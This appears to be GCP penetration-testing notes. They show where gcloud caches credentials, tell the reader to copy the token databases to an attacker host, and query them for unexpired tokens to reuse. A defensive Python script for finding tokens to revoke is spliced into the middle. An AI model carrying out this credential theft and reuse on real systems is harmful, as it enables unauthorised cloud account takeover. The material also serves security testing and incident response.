https://github.com/orcasecurity/orca-toolbox/tree/main/GCP-Storage-Explorer
https://github.com/orcasecurity/orca-toolbox/tree/main/GCP-Lateral-Movement-Detector
https://hub.steampipe.io/mods/turbot/gcp_compliance
Windows:
C:\Users\[Username]\AppData\Roaming\gcloud
Linux / macOS:
~/.config/gcloud/
~/.config/gcloud/application_default_credentials.json
gcloud auth login (or gcloud auth activate-service-account) appends an entry to the credentials.db database. Copy access_tokens.db and credentials.db to the attacker host. Once copied:
gcloud auth list
gcloud config set account {account name}
gcloud projects list
Multiple access tokens
If you run into a user who has multiple account_ids in the database, pick the account whose access token has not expired. The SQLite queries shown below find the account tokens that have not yet expired (copied from https://desi-jarvis.medium.com/compromised-endpoint-to-compromised-gcp-gone-in-60-seconds-3229cc185863 ).
iron@ubuntu:~/.config/gcloud$ sqlite3 access_tokens.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> .tables
access_tokens
sqlite> select account_id,token_expiry from access_tokens;
fe247b280bf225a********3c4a628788c9afc|2022-04-27 12:02:02.923763
[email protected]|2022-04-28 09:20:00.965168
sqlite> .quit
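The same expiry check as a small triage script, added here as an example (not from the page or from any of the linked projects): a responder examining a host can list which cached gcloud tokens are still live and therefore need revoking. It assumes only the account_id and token_expiry columns seen in the session above; the rows are constructed sample data, not a real database.

```python
import sqlite3
from datetime import datetime, timezone

# Constructed sample rows mirroring the account_id|token_expiry columns of
# gcloud's access_tokens.db (naive UTC timestamps, microsecond precision).
# Only these two columns are assumed; the real table has more.
SAMPLE_ROWS = [
    ("fe247b280bf225a0000000003c4a628788c9afc", "2022-04-27 12:02:02.923763"),
    ("user@example.com", "2022-04-28 09:20:00.965168"),
    ("svc@example.iam.gserviceaccount.com", "2099-01-01 00:00:00.000000"),
]

def build_sample_db():
    """In-memory stand-in for ~/.config/gcloud/access_tokens.db."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE access_tokens (account_id TEXT PRIMARY KEY, token_expiry TIMESTAMP)")
    conn.executemany("INSERT INTO access_tokens VALUES (?, ?)", SAMPLE_ROWS)
    return conn

def parse_expiry(value):
    """gcloud stores naive UTC timestamps; tolerate a missing fraction."""
    for fmt in ("%Y-%m-%d %H:%M:%S.%f", "%Y-%m-%d %H:%M:%S"):
        try:
            return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)
        except ValueError:
            continue
    raise ValueError(f"unrecognised token_expiry: {value!r}")

def live_tokens(conn, now=None):
    """Return [(account_id, seconds_remaining)] for tokens not yet expired,
    longest-lived first. `now` may be a datetime or a timestamp string."""
    if now is None:
        now = datetime.now(timezone.utc)
    elif isinstance(now, str):
        now = parse_expiry(now)
    live = []
    for account_id, expiry in conn.execute("SELECT account_id, token_expiry FROM access_tokens"):
        remaining = (parse_expiry(expiry) - now).total_seconds()
        if remaining > 0:
            live.append((account_id, int(remaining)))
    return sorted(live, key=lambda row: -row[1])

if __name__ == "__main__":
    # Point this at a copy of a real access_tokens.db with sqlite3.connect(path).
    for account, secs in live_tokens(build_sample_db()):
        print(f"{account}: cached token still valid for {secs}s, revoke it")
```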
gcloud asset search-all-resources --asset-types='storage.googleapis.com/Bucket'